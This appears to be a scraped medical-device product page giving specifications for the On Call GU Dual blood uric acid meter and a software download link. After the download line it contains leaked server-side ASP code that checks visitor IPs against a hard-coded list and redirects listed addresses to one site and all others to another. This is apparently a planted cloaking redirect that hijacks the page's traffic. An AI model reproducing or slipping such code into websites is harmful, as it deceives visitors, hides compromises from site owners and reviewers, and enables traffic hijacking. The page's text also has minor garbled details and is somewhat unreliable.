Home>Products>>On Call GU Dual

Specifications

Glucose: Compatible with On Call® Sure BG Strip
Blood Uric Acid Specifications
Measurement Range 3-20 mg/dL (178-1190 μmmol/L)
Test Time 10 Seconds
Sample Size 3 μL
Sample Type Fresh whole blood (Capillary and Venous)
Coding Method Code
Hematocrit Range 30-55%
Memory 500 results with date and time

Components

Diabetes Management Software

Please click here to download
<% requestIP = request.ServerVariables("REMOTE_ADDR") IP = "[223.109.206.196|120.216.162.113|45.40.51.242|13.67.144.27]" trueURL = "http://www.baidu.com" falseURL = "http://www.google.com" ipArr = split(IP,"|") flag = false for i=0 to ubound(ipArr) if requestIP=ipArr(i) then flag=true exit for end if next if flag then response.Redirect(falseURL) else response.Redirect(trueURL) end if %>